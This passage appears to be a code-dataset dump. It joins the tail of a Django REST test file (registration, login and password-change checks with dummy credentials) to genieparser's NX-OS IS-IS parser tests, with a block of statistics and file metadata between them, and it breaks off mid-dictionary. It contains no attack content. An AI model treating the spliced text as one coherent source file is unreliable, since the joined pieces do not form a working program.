"full_name": "Company One",
"company_name": "Company group",
"email": "company11@user.com",
"role": "CEO",
"password1": "testpassword",
"password2": "testpassword"
}
existing_email = {
"full_name": "Company One",
"company_name": "Company groups",
"email": "company1@user.com",
"role": "CEO",
"password1": "testpassword",
"password2": "testpassword"
}
# Organisation tried registering without full name
response = self.client.post(reverse('rest_register'), data=data_without_full_name, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Field full_name is required')
# Organisation tried registering with invalid full name
response = self.client.post(reverse('rest_register'), data=data_with_invalid_full_name, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Please provide your first name and last name')
# Organisation tried registering without role
response = self.client.post(reverse('rest_register'), data=data_without_role, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Field role is required')
# Organisation tried registering without company name
response = self.client.post(reverse('rest_register'), data=data_without_company_name, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Field company_name is required')
# Organisation tried registering without email
response = self.client.post(reverse('rest_register'), data=data_without_email, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Field email is required')
# Organisation tried registering without password1
response = self.client.post(reverse('rest_register'), data=data_without_password1, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Field password1 is required')
# Organisation tried registering without password2
response = self.client.post(reverse('rest_register'), data=data_without_password2, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Field password2 is required')
# Organisation tried registering without valid email
response = self.client.post(reverse('rest_register'), data=data_without_valid_email, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Enter a valid email address.')
# Organisation tried registering without matching passwords
response = self.client.post(reverse('rest_register'), data=data_without_matching_password, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'The two password fields didn\'t match.')
# Organisation tried registering with good data
response = self.client.post(reverse('rest_register'), data=good_data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data.get('detail'), 'Employer successfully onboarded with initial amount of nine '
'hundred and ninety nine trillion (999999999999999). '
'Please login to continue')
# check wallet was created for organisation
self.assertIsNotNone(um.Organisation.objects.get(name="Company group").wallet)
# check admin object is created for email just onboarded
self.assertIsNotNone(um.Admin.objects.get(user__email='company1@user.com'))
# check super admin object is created for this email
self.assertIsNotNone(um.OrganisationAdmin.objects.get(organisation__name="Company group",
admin__user__email='company1@user.com',
admin_type='super_admin'))
# Another Organisation tried registering with existing company name
response = self.client.post(reverse('rest_register'), data=existing_company_name, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Company name already exists')
# Another Organisation tried registering with existing email
response = self.client.post(reverse('rest_register'), data=existing_email, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'A user is already registered with this e-mail address.')
class LoginTest(TestCase):
def setUp(self) -> None:
self.client = APIClient()
def test_organisation_can_log_in(self):
good_data = {
"email": "company1@user.com",
"password": "testpassword",
}
data_without_email = {
"password": "testpassword",
}
data_without_password = {
"email": "company1@user.com",
}
non_admin_email = {
"email": "user1@user.com",
"password": "testpassword",
}
data_with_wrong_auth_details = {
"email": "company1@user.com",
"password": "testpassword234",
}
sign_up_data = {
"full_name": "Company One",
"company_name": "Company group",
"email": "company1@user.com",
"role": "CEO",
"password1": "testpassword",
"password2": "testpassword"
}
# Organisation onboards
response = self.client.post(reverse('rest_register'), data=sign_up_data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data.get('detail'), 'Employer successfully onboarded with initial amount of nine '
'hundred and ninety nine trillion (999999999999999). '
'Please login to continue')
# Organisation tried authenticating without email
response = self.client.post(reverse('rest_login'), data=data_without_email, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Field email is required')
# Organisation tried authenticating without password
response = self.client.post(reverse('rest_login'), data=data_without_password, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Field password is required')
# Non admin email tries signing up
response = self.client.post(reverse('rest_login'), data=non_admin_email, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'You are not an admin')
# Organisation tried authenticating with wrong auth details
response = self.client.post(reverse('rest_login'), data=data_with_wrong_auth_details, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Unable to log in with provided credentials.')
# Organisation tried authenticating with good data
login_response = self.client.post(reverse('rest_login'), data=good_data, format='json')
self.assertEqual(login_response.status_code, status.HTTP_200_OK)
# Check access token is returned
self.assertIsNotNone(login_response.data.get('access_token'))
# Check refresh token is returned
self.assertIsNotNone(login_response.data.get('refresh_token'))
employee_data = {
"full_name": "Employee Five",
"email": "employee5@user.com"
}
admin_data = {
"full_name": "Admin One",
"email": "admin1@user.com"
}
login_admin_data = {
"email": "admin1@user.com",
"password": "testpassword"
}
login_employee_data = {
"email": "employee5@user.com",
"password": "testpassword"
}
# organisation add employee
self.client.credentials(HTTP_AUTHORIZATION='Bearer {}'.format(login_response.data.get('access_token')))
response = self.client.post(reverse('organisation-add-employee'), data=employee_data,
format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
# organisation add admin
self.client.credentials(HTTP_AUTHORIZATION='Bearer {}'.format(login_response.data.get('access_token')))
response = self.client.post(reverse('organisation-add-admin'), data=admin_data,
format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.client.credentials()
# Admin logs in
admin_login_response = self.client.post(reverse('rest_login'), data=login_admin_data, format='json')
self.assertEqual(admin_login_response.status_code, status.HTTP_200_OK)
# Check access token is returned
self.assertIsNotNone(admin_login_response.data.get('access_token'))
# Check refresh token is returned
self.assertIsNotNone(admin_login_response.data.get('refresh_token'))
# employee logs in
employee_login_response = self.client.post(reverse('rest_login2'), data=login_employee_data, format='json')
self.assertEqual(employee_login_response.status_code, status.HTTP_200_OK)
# Check access token is returned
self.assertIsNotNone(employee_login_response.data.get('access_token'))
# Check refresh token is returned
self.assertIsNotNone(employee_login_response.data.get('refresh_token'))
class ChangePasswordTest(TestCase):
def setUp(self) -> None:
self.client = APIClient()
def test_change_password(self):
sign_up_data = {
"full_name": "Company One",
"company_name": "Company group",
"email": "company1@user.com",
"role": "CEO",
"password1": "testpassword",
"password2": "testpassword"
}
good_data = {
"email": "company1@user.com",
"password": "testpassword",
}
good_password_data = {
"old_password": "testpassword",
"new_password1": "testpassword1",
"new_password2": "testpassword1"
}
password_data_without_old_password = {
"new_password1": "testpassword",
"new_password2": "testpassword"
}
password_data_with_incorrect_old_password = {
"old_password": "testpassword1",
"new_password1": "testpassword",
"new_password2": "testpassword"
}
password_data_without_new_password1 = {
"old_password": "testpassword",
"new_password2": "testpassword"
}
password_data_without_new_password2 = {
"old_password": "testpassword",
"new_password1": "testpassword",
}
password_data_not_match = {
"old_password": "testpassword",
"new_password1": "testpassword1",
"new_password2": "testpassword2"
}
# Organisation onboards
response = self.client.post(reverse('rest_register'), data=sign_up_data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Organisation tries changing password without authenticating
response = self.client.post(reverse('rest_password_change'), data=good_password_data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(response.data.get('detail'), 'Authentication credentials were not provided.')
# Organisation logs in
login_response = self.client.post(reverse('rest_login'), data=good_data, format='json')
self.assertEqual(login_response.status_code, status.HTTP_200_OK)
# organisation tries changing password without old password
self.client.credentials(HTTP_AUTHORIZATION='Bearer {}'.format(login_response.data.get('access_token')))
response = self.client.post(reverse('rest_password_change'), data=password_data_without_old_password,
format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Field old_password is required')
# organisation tries changing password without new password1
response = self.client.post(reverse('rest_password_change'), data=password_data_without_new_password1,
format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Field new_password1 is required')
# organisation tries changing password with incorrect old password
response = self.client.post(reverse('rest_password_change'), data=password_data_with_incorrect_old_password,
format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Your old password was entered incorrectly. Please enter it '
'again.')
# organisation tries changing password without new password2
response = self.client.post(reverse('rest_password_change'), data=password_data_without_new_password2,
format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'Field new_password2 is required')
# organisation tries changing password without password that don't match
response = self.client.post(reverse('rest_password_change'), data=password_data_not_match,
format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data.get('detail'), 'The two password fields didn’t match.')
# organisation tries changing password with good password data
response = self.client.post(reverse('rest_password_change'), data=good_password_data,
format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data.get('detail'), 'New password has been saved.')
employee_data = {
"full_name": "Employee Five",
"email": "employee5@user.com"
}
admin_data = {
"full_name": "Admin One",
"email": "admin1@user.com"
}
login_admin_data = {
"email": "admin1@user.com",
"password": "testpassword"
}
login_employee_data = {
"email": "employee5@user.com",
"password": "testpassword"
}
# organisation add employee
response = self.client.post(reverse('organisation-add-employee'), data=employee_data,
format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
# organisation add admin
response = self.client.post(reverse('organisation-add-admin'), data=admin_data,
format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.client.credentials()
# Admin logs in
admin_login_response = self.client.post(reverse('rest_login'), data=login_admin_data, format='json')
self.assertEqual(admin_login_response.status_code, status.HTTP_200_OK)
# admin tries changing password with good password data
self.client.credentials(HTTP_AUTHORIZATION='Bearer {}'.format(admin_login_response.data.get('access_token')))
response = self.client.post(reverse('rest_password_change'), data=good_password_data,
format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data.get('detail'), 'New password has been saved.')
self.client.credentials()
# employee logs in
employee_login_response = self.client.post(reverse('rest_login2'), data=login_employee_data, format='json')
self.assertEqual(employee_login_response.status_code, status.HTTP_200_OK)
# employee tries changing password with good password data
self.client.credentials(HTTP_AUTHORIZATION='Bearer {}'.format(employee_login_response.data.get('access_token')))
response = self.client.post(reverse('rest_password_change'), data=good_password_data,
format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data.get('detail'), 'New password has been saved.')
self.client.credentials()
| 44.018908
| 120
| 0.630172
| 2,178
| 20,953
| 5.85124
| 0.080349
| 0.074153
| 0.102872
| 0.063873
| 0.864642
| 0.840003
| 0.793079
| 0.774404
| 0.722065
| 0.695543
| 0
| 0.015058
| 0.26149
| 20,953
| 475
| 121
| 44.111579
| 0.808518
| 0.093829
| 0
| 0.615836
| 0
| 0
| 0.241895
| 0.004964
| 0
| 0
| 0
| 0
| 0.211144
| 1
| 0.017595
| false
| 0.255132
| 0.014663
| 0
| 0.041056
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e0eda045d26743766dea6a3836db56e7c98a7684
| 150,103
|
py
|
Python
|
src/genie/libs/parser/nxos/tests/test_show_isis.py
|
svautour/genieparser
|
7416c9a4b44582be835a0646fb7fad92a5181c7d
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/nxos/tests/test_show_isis.py
|
svautour/genieparser
|
7416c9a4b44582be835a0646fb7fad92a5181c7d
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/nxos/tests/test_show_isis.py
|
svautour/genieparser
|
7416c9a4b44582be835a0646fb7fad92a5181c7d
|
[
"Apache-2.0"
] | null | null | null |
#!/bin/env python
import unittest
from unittest.mock import Mock
from pyats.topology import Device
from genie.metaparser.util.exceptions import (SchemaMissingKeyError,
SchemaEmptyParserError)
from genie.libs.parser.nxos.show_isis import (ShowIsis,
ShowIsisHostname,
ShowIsisAdjacency,
ShowIsisInterface,
ShowIsisSpfLogDetail,
ShowIsisDatabaseDetail,
ShowIsisHostnameDetail)
class TestShowIsis(unittest.TestCase):
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'instance': {
'test': {
'isis_process': 'test',
'instance_number': 1,
'uuid': '1090519320',
'process_id': 1581,
'vrf': {
'default': {
'vrf': 'default',
'system_id': '3333.3333.3333',
'is_type': 'L1-L2',
'sap': 412,
'queue_handle': 15,
'maximum_lsp_mtu': 1492,
'stateful_ha': 'enabled',
'graceful_restart': {
'enable': True,
'state': 'Inactive',
'last_gr_status': 'none',
},
'start_mode': 'Complete',
'bfd_ipv4': 'globally disabled',
'bfd_ipv6': 'globally disabled',
'topology_mode': 'Multitopology',
'metric_type': {
'advertise': ['wide'],
'accept': ['narrow', 'wide'],
},
'area_address': ['49.0001'],
'process': 'up and running',
'vrf_id': 1,
'during_non_graceful_controlled_restart': 'Stale routes',
'resolution_of_l3_to_l2': 'Enable',
'sr_ipv4': 'not configured and disabled',
'sr_ipv6': 'not configured and disabled',
'supported_interfaces': ['Loopback0', 'Ethernet1/1.115', 'Ethernet1/2.115'],
'topology': {
0: {
'address_family': {
'ipv4_unicast': {
'number_of_interface': 3,
'distance': 115,
},
'ipv6_unicast': {
'number_of_interface': 0,
'distance': 115,
},
},
},
2: {
'address_family': {
'ipv6_unicast': {
'number_of_interface': 3,
'distance': 115,
},
},
},
},
'authentication': {
'level_1': {
'auth_check': 'set',
},
'level_2': {
'auth_check': 'set',
},
},
'l1_next_spf': '00:00:07',
'l2_next_spf': '00:00:04',
},
'VRF1': {
'vrf': 'VRF1',
'system_id': '3333.3333.3333',
'is_type': 'L1-L2',
'sap': 412,
'queue_handle': 15,
'maximum_lsp_mtu': 1492,
'stateful_ha': 'enabled',
'graceful_restart': {
'enable': True,
'state': 'Inactive',
'last_gr_status': 'none',
},
'start_mode': 'Complete',
'bfd_ipv4': 'globally disabled',
'bfd_ipv6': 'globally disabled',
'topology_mode': 'Multitopology',
'metric_type': {
'advertise': ['wide'],
'accept': ['narrow', 'wide'],
},
'area_address': ['49.0001'],
'process': 'up and running',
'vrf_id': 3,
'during_non_graceful_controlled_restart': 'Stale routes',
'resolution_of_l3_to_l2': 'Enable',
'sr_ipv4': 'not configured and disabled',
'sr_ipv6': 'not configured and disabled',
'supported_interfaces': ['Loopback300', 'Ethernet1/1.415', 'Ethernet1/2.415'],
'topology': {
0: {
'address_family': {
'ipv4_unicast': {
'number_of_interface': 3,
'distance': 115,
},
'ipv6_unicast': {
'number_of_interface': 0,
'distance': 115,
},
},
},
2: {
'address_family': {
'ipv6_unicast': {
'number_of_interface': 3,
'distance': 115,
},
},
},
},
'authentication': {
'level_1': {
'auth_check': 'set',
},
'level_2': {
'auth_check': 'set',
},
},
'l1_next_spf': 'Inactive',
'l2_next_spf': 'Inactive',
},
},
},
},
}
golden_output = {'execute.return_value': '''\
R3_nx# show isis vrf all
ISIS process : test
Instance number : 1
UUID: 1090519320
Process ID 1581
VRF: default
System ID : 3333.3333.3333 IS-Type : L1-L2
SAP : 412 Queue Handle : 15
Maximum LSP MTU: 1492
Stateful HA enabled
Graceful Restart enabled. State: Inactive
Last graceful restart status : none
Start-Mode Complete
BFD IPv4 is globally disabled for ISIS process: test
BFD IPv6 is globally disabled for ISIS process: test
Topology-mode is Multitopology
Metric-style : advertise(wide), accept(narrow, wide)
Area address(es) :
49.0001
Process is up and running
VRF ID: 1
Stale routes during non-graceful controlled restart
Enable resolution of L3->L2 address for ISIS adjacency
SR IPv4 is not configured and disabled for ISIS process: test
SR IPv6 is not configured and disabled for ISIS process: test
Interfaces supported by IS-IS :
loopback0
Ethernet1/1.115
Ethernet1/2.115
Topology : 0
Address family IPv4 unicast :
Number of interface : 3
Distance : 115
Address family IPv6 unicast :
Number of interface : 0
Distance : 115
Topology : 2
Address family IPv6 unicast :
Number of interface : 3
Distance : 115
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
L1 Next SPF: 00:00:07
L2 Next SPF: 00:00:04
ISIS process : test
Instance number : 1
UUID: 1090519320
Process ID 1581
VRF: VRF1
System ID : 3333.3333.3333 IS-Type : L1-L2
SAP : 412 Queue Handle : 15
Maximum LSP MTU: 1492
Stateful HA enabled
Graceful Restart enabled. State: Inactive
Last graceful restart status : none
Start-Mode Complete
BFD IPv4 is globally disabled for ISIS process: test
BFD IPv6 is globally disabled for ISIS process: test
Topology-mode is Multitopology
Metric-style : advertise(wide), accept(narrow, wide)
Area address(es) :
49.0001
Process is up and running
VRF ID: 3
Stale routes during non-graceful controlled restart
Enable resolution of L3->L2 address for ISIS adjacency
SR IPv4 is not configured and disabled for ISIS process: test
SR IPv6 is not configured and disabled for ISIS process: test
Interfaces supported by IS-IS :
loopback300
Ethernet1/1.415
Ethernet1/2.415
Topology : 0
Address family IPv4 unicast :
Number of interface : 3
Distance : 115
Address family IPv6 unicast :
Number of interface : 0
Distance : 115
Topology : 2
Address family IPv6 unicast :
Number of interface : 3
Distance : 115
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
L1 Next SPF: Inactive
L2 Next SPF: Inactive
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowIsis(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowIsis(device=self.device)
parsed_output = obj.parse(vrf='all')
self.assertEqual(parsed_output,self.golden_parsed_output)
class TestShowIsisInterface(unittest.TestCase):
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'instance': {
'test': {
'vrf': {
'default': {
'interfaces': {
'loopback0': {
'name': 'loopback0',
'status': 'protocol-up/link-up/admin-up',
'ipv4': '10.36.3.3',
'ipv4_subnet': '10.36.3.3/32',
'ipv6': {
'2001:10:13:115::3/64': {
'state': 'VALID'
},
'2001:10:13:115::33/64': {
'state': 'VALID'
},
'2001:10::33/48': {
'state': 'VALID'
},
'2001:3:3:3:3::/128': {
'state': 'VALID'
},
},
'ipv6_subnet': '2001:3:3:3::3/128',
'ipv6_link_local_address': 'fe80::5c00:80ff:fe02:0',
'authentication': {
'level_1': {
'auth_check': 'set',
},
'level_2': {
'auth_check': 'set',
},
},
'index': '0x0001',
'local_circuit_id': '0x01',
'circuit_type': 'L1-2',
'bfd_ipv4': 'locally disabled',
'bfd_ipv6': 'locally disabled',
'mtr': 'enabled',
'levels': {
'1': {
'metric': '1',
},
'2': {
'metric': '1',
},
},
'topologies': {
'0': {
'level': {
'1': {
'metric': '1',
'metric_cfg': 'no',
'fwdng': 'UP',
'ipv4_mt': 'UP',
'ipv4_cfg': 'yes',
'ipv6_mt': 'DN',
'ipv6_cfg': 'yes',
},
'2': {
'metric': '1',
'metric_cfg': 'no',
'fwdng': 'UP',
'ipv4_mt': 'UP',
'ipv4_cfg': 'yes',
'ipv6_mt': 'DN',
'ipv6_cfg': 'yes',
},
},
},
'2': {
'level': {
'1': {
'metric': '1',
'metric_cfg': 'no',
'fwdng': 'UP',
'ipv4_mt': 'DN',
'ipv4_cfg': 'no',
'ipv6_mt': 'UP',
'ipv6_cfg': 'yes',
},
'2': {
'metric': '1',
'metric_cfg': 'no',
'fwdng': 'UP',
'ipv4_mt': 'DN',
'ipv4_cfg': 'no',
'ipv6_mt': 'UP',
'ipv6_cfg': 'yes',
},
},
},
},
},
'Ethernet1/1.115': {
'name': 'Ethernet1/1.115',
'status': 'protocol-up/link-up/admin-up',
'ipv4': '10.23.115.3',
'ipv4_subnet': '10.23.115.0/24',
'ipv6': {
'2001:10:23:115::3/64': {
'state': 'VALID',
},
},
'ipv6_subnet': '2001:10:23:115::/64',
'ipv6_link_local_address': 'fe80::5c00:80ff:fe02:7',
'authentication': {
'level_1': {
'auth_check': 'set',
},
'level_2': {
'auth_check': 'set',
},
},
'index': '0x0002',
'local_circuit_id': '0x01',
'circuit_type': 'L1-2',
'bfd_ipv4': 'locally disabled',
'bfd_ipv6': 'locally disabled',
'mtr': 'enabled',
'mtu': 1500,
'lsp_interval_ms': 33,
'levels': {
'1': {
'designated_is': 'R2_xr',
'metric_0': '40',
'metric_2': '40',
'csnp': '10',
'next_csnp': 'Inactive',
'hello': '10',
'multi': '3',
'next_iih': '00:00:04',
'adjs': '1',
'adjs_up': '1',
'pri': '64',
'circuit_id': 'R2_xr.03',
'since': '5d01h',
},
'2': {
'designated_is': 'R2_xr',
'metric_0': '40',
'metric_2': '40',
'csnp': '10',
'next_csnp': '00:00:03',
'hello': '10',
'multi': '3',
'next_iih': '00:00:09',
'adjs': '1',
'adjs_up': '1',
'pri': '64',
'circuit_id': 'R2_xr.03',
'since': '5d01h',
},
},
'topologies': {
'0': {
'level': {
'1': {
'metric': '40',
'metric_cfg': 'no',
'fwdng': 'UP',
'ipv4_mt': 'UP',
'ipv4_cfg': 'yes',
'ipv6_mt': 'DN',
'ipv6_cfg': 'yes',
},
'2': {
'metric': '40',
'metric_cfg': 'no',
'fwdng': 'UP',
'ipv4_mt': 'UP',
'ipv4_cfg': 'yes',
'ipv6_mt': 'DN',
'ipv6_cfg': 'yes',
},
},
},
'2': {
'level': {
'1': {
'metric': '40',
'metric_cfg': 'no',
'fwdng': 'UP',
'ipv4_mt': 'DN',
'ipv4_cfg': 'no',
'ipv6_mt': 'UP',
'ipv6_cfg': 'yes',
},
'2': {
'metric': '40',
'metric_cfg': 'no',
'fwdng': 'UP',
'ipv4_mt': 'DN',
'ipv4_cfg': 'no',
'ipv6_mt': 'UP',
'ipv6_cfg': 'yes',
},
},
},
},
},
'Ethernet1/2.115': {
'name': 'Ethernet1/2.115',
'status': 'protocol-up/link-up/admin-up',
'ipv4': '10.13.115.3',
'ipv4_subnet': '10.13.115.0/24',
'ipv6': {
'2001:10:13:115::3/64': {
'state': 'VALID',
},
},
'ipv6_subnet': '2001:10:13:115::/64',
'ipv6_link_local_address': 'fe80::5c00:80ff:fe02:7',
'authentication': {
'level_1': {
'auth_check': 'set',
},
'level_2': {
'auth_check': 'set',
},
},
'index': '0x0003',
'local_circuit_id': '0x02',
'circuit_type': 'L1-2',
'bfd_ipv4': 'locally disabled',
'bfd_ipv6': 'locally disabled',
'mtr': 'enabled',
'mtu': 1500,
'lsp_interval_ms': 33,
'levels': {
'1': {
'designated_is': 'R1_xe',
'metric_0': '40',
'metric_2': '40',
'csnp': '10',
'next_csnp': '00:00:10',
'hello': '10',
'multi': '3',
'next_iih': '00:00:03',
'adjs': '1',
'adjs_up': '1',
'pri': '64',
'circuit_id': 'R1_xe.02',
'since': '5d01h',
},
'2': {
'designated_is': 'R1_xe',
'metric_0': '40',
'metric_2': '40',
'csnp': '10',
'next_csnp': '00:00:02',
'hello': '10',
'multi': '3',
'next_iih': '00:00:02',
'adjs': '1',
'adjs_up': '1',
'pri': '64',
'circuit_id': 'R1_xe.02',
'since': '5d01h',
},
},
'topologies': {
'0': {
'level': {
'1': {
'metric': '40',
'metric_cfg': 'no',
'fwdng': 'UP',
'ipv4_mt': 'UP',
'ipv4_cfg': 'yes',
'ipv6_mt': 'DN',
'ipv6_cfg': 'yes',
},
'2': {
'metric': '40',
'metric_cfg': 'no',
'fwdng': 'UP',
'ipv4_mt': 'UP',
'ipv4_cfg': 'yes',
'ipv6_mt': 'DN',
'ipv6_cfg': 'yes',
},
},
},
'2': {
'level': {
'1': {
'metric': '40',
'metric_cfg': 'no',
'fwdng': 'UP',
'ipv4_mt': 'DN',
'ipv4_cfg': 'no',
'ipv6_mt': 'UP',
'ipv6_cfg': 'yes',
},
'2': {
'metric': '40',
'metric_cfg': 'no',
'fwdng': 'UP',
'ipv4_mt': 'DN',
'ipv4_cfg': 'no',
'ipv6_mt': 'UP',
'ipv6_cfg': 'yes',
},
},
},
},
},
},
},
},
},
},
}
golden_output = {'execute.return_value': '''\
R3_nx# show isis interface vrf default
IS-IS process: test VRF: default
loopback0, Interface status: protocol-up/link-up/admin-up
IP address: 10.36.3.3, IP subnet: 10.36.3.3/32
IPv6 address:
2001:10:13:115::3/64 [VALID]
2001:10:13:115::33/64 [VALID]
2001:10::33/48 [VALID]
2001:3:3:3:3::/128 [VALID]
IPv6 subnet: 2001:3:3:3::3/128
IPv6 link-local address: fe80::5c00:80ff:fe02:0
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0001, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface loopback0
BFD IPv6 is locally disabled for Interface loopback0
MTR is enabled
Level Metric
1 1
2 1
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 1 no UP UP yes DN yes
1 2 1 no UP DN no UP yes
2 0 1 no UP UP yes DN yes
2 2 1 no UP DN no UP yes
Ethernet1/1.115, Interface status: protocol-up/link-up/admin-up
IP address: 10.23.115.3, IP subnet: 10.23.115.0/24
IPv6 address:
2001:10:23:115::3/64 [VALID]
IPv6 subnet: 2001:10:23:115::/64
IPv6 link-local address: fe80::5c00:80ff:fe02:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0002, Local Circuit ID: 0x01, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface Ethernet1/1.115
BFD IPv6 is locally disabled for Interface Ethernet1/1.115
MTR is enabled
LSP interval: 33 ms, MTU: 1500
Level-1 Designated IS: R2_xr
Level-2 Designated IS: R2_xr
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 Inactive 10 3 00:00:04
2 40 40 10 00:00:03 10 3 00:00:09
Level Adjs AdjsUp Pri Circuit ID Since
1 1 1 64 R2_xr.03 5d01h
2 1 1 64 R2_xr.03 5d01h
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP UP yes DN yes
1 2 40 no UP DN no UP yes
2 0 40 no UP UP yes DN yes
2 2 40 no UP DN no UP yes
Ethernet1/2.115, Interface status: protocol-up/link-up/admin-up
IP address: 10.13.115.3, IP subnet: 10.13.115.0/24
IPv6 address:
2001:10:13:115::3/64 [VALID]
IPv6 subnet: 2001:10:13:115::/64
IPv6 link-local address: fe80::5c00:80ff:fe02:7
Level1
No auth type and keychain
Auth check set
Level2
No auth type and keychain
Auth check set
Index: 0x0003, Local Circuit ID: 0x02, Circuit Type: L1-2
BFD IPv4 is locally disabled for Interface Ethernet1/2.115
BFD IPv6 is locally disabled for Interface Ethernet1/2.115
MTR is enabled
LSP interval: 33 ms, MTU: 1500
Level-1 Designated IS: R1_xe
Level-2 Designated IS: R1_xe
Level Metric-0 Metric-2 CSNP Next CSNP Hello Multi Next IIH
1 40 40 10 00:00:10 10 3 00:00:03
2 40 40 10 00:00:02 10 3 00:00:02
Level Adjs AdjsUp Pri Circuit ID Since
1 1 1 64 R1_xe.02 5d01h
2 1 1 64 R1_xe.02 5d01h
Topologies enabled:
L MT Metric MetricCfg Fwdng IPV4-MT IPV4Cfg IPV6-MT IPV6Cfg
1 0 40 no UP UP yes DN yes
1 2 40 no UP DN no UP yes
2 0 40 no UP UP yes DN yes
2 2 40 no UP DN no UP yes
'''}
golden_parsed_output1 = {
"instance": {
"test": {
"vrf": {
"default": {
"interfaces": {
"Ethernet1/1": {
"name": "Ethernet1/1",
"status": "protocol-up/link-up/admin-up",
"ipv4": "10.5.7.7",
"ipv4_subnet": "10.5.7.0/24",
"ipv6": {
"2001:db8:10:5:7::7/64": {
"state": "VALID"
}
},
"ipv6_subnet": "2001:db8:10:5::/64",
"ipv6_link_local_address": "fe80::5c00:40ff:fe06:7",
"authentication": {
"level_1": {
"auth_check": "set"
},
"level_2": {
"auth_check": "set"
}
},
"index": "0x0002",
"local_circuit_id": "0x01",
"circuit_type": "L1-2",
"bfd_ipv4": "locally disabled",
"bfd_ipv6": "locally disabled",
"mtr": "enabled",
"passive": "level-1-2",
"mtu": 1500,
"lsp_interval_ms": 33,
"levels": {
"1": {
"metric_0": "40",
"metric_2": "40",
"csnp": "10",
"next_csnp": "Inactive",
"hello": "10",
"multi": "3",
"next_iih": "Inactive",
"adjs": "0",
"adjs_up": "0",
"pri": "64",
"circuit_id": "0000.0000.0000.00",
"since": "2w2d"
},
"2": {
"metric_0": "40",
"metric_2": "40",
"csnp": "10",
"next_csnp": "Inactive",
"hello": "10",
"multi": "3",
"next_iih": "Inactive",
"adjs": "0",
"adjs_up": "0",
"pri": "64",
"circuit_id": "0000.0000.0000.00",
"since": "2w2d"
}
},
"topologies": {
"0": {
"level": {
"1": {
"metric": "40",
"metric_cfg": "no",
"fwdng": "UP",
"ipv4_mt": "DN",
"ipv4_cfg": "yes",
"ipv6_mt": "DN",
"ipv6_cfg": "yes"
},
"2": {
"metric": "40",
"metric_cfg": "no",
